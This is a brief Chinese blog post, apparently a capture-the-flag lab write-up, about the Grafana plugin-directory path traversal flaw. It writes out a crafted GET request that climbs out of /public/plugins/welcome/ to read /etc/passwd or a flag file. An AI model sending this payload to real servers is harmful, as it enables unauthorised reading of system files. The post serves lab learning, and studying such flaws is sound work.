Grafana 插件模块目录穿越漏洞 黑芝麻BiuBiu_S 2024-12-02 113 阅读1分钟 简介 Grafana是一个开源的度量分析与可视化套件。 这个漏洞出现在插件模块中,这个模块支持用户访问插件目录下的文件,但因为没有对文件名进行限制,操作者可以利用该漏洞穿越目录,读取到服务器上的任意文件 步骤 进入靶场首页 拦截数据包 构造请求包 GET /public/plugins/welcome/../../../../../../../../etc/passwd | /tmp/flag.txt HTTP/1.1 Host: ip Connection: close 夺旗
